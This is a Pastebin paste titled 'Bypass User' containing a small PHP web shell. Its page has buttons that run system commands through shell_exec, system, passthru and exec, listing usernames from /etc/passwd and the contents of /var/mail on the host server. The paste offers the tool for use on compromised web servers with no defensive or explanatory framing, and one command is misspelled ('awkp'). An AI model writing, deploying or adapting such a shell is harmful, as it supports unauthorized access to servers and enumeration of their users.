Advertisement
CYBERSERKERS

Bypass User

Jan 22nd, 2016
306
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.18 KB | None | 0 0
  1. <? echo"<title>ByPass User</title><body bgcolor=silver><center><a href=http://azzatssinz.tumblr.com><img src=http://azzat.wap.mu/files/1049320/assassin_s_creed_iv_black_flag.png></a><br><br><form method=post><input type=submit name=awkp value=AWK PROGRAM><input type=submit name=syst value=SYSTEM FUNCTION><input type=submit name=passth value=PASSTHRU><input type=submit name=ex value=EXEC FUNCTION><input type=submit name=shex value=SHELL_EXEC></form>"; /*Awk Program*/ if($_POST['awkp']){
  2.  echo"<textarea cols='60' rows='40'>";
  3. echo shell_exec("awkp -F: '{ print $1 }' /etc/passwd | sort");
  4. echo"</textarea><br>";
  5. } /*System Function*/ if($_POST['syst']){
  6.  echo"<textarea cols='60' rows='40'>";
  7. echo system("ls /var/mail");
  8. echo"</textarea><br>";
  9. }
  10. /*Passthru Function*/ if($_POST['passth']){
  11.  echo"<textarea cols='60' rows='40'>";
  12. echo passthru("ls /var/mail");
  13. echo"</textarea><br>";
  14. } /*exec Function*/
  15.  if($_POST['ex']){
  16.  echo"<textarea cols='60' rows='40'>";
  17. echo exec("ls /var/mail");
  18. echo"</textarea><br>";
  19. }
  20.  /*shell_exec Function*/ if($_POST['shex']){
  21.  echo"<textarea cols='60' rows='40'>";
  22. echo shell_exec("ls /var/mail");
  23. echo"</textarea><br>";
  24. }
  25. echo"</center></body>";?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement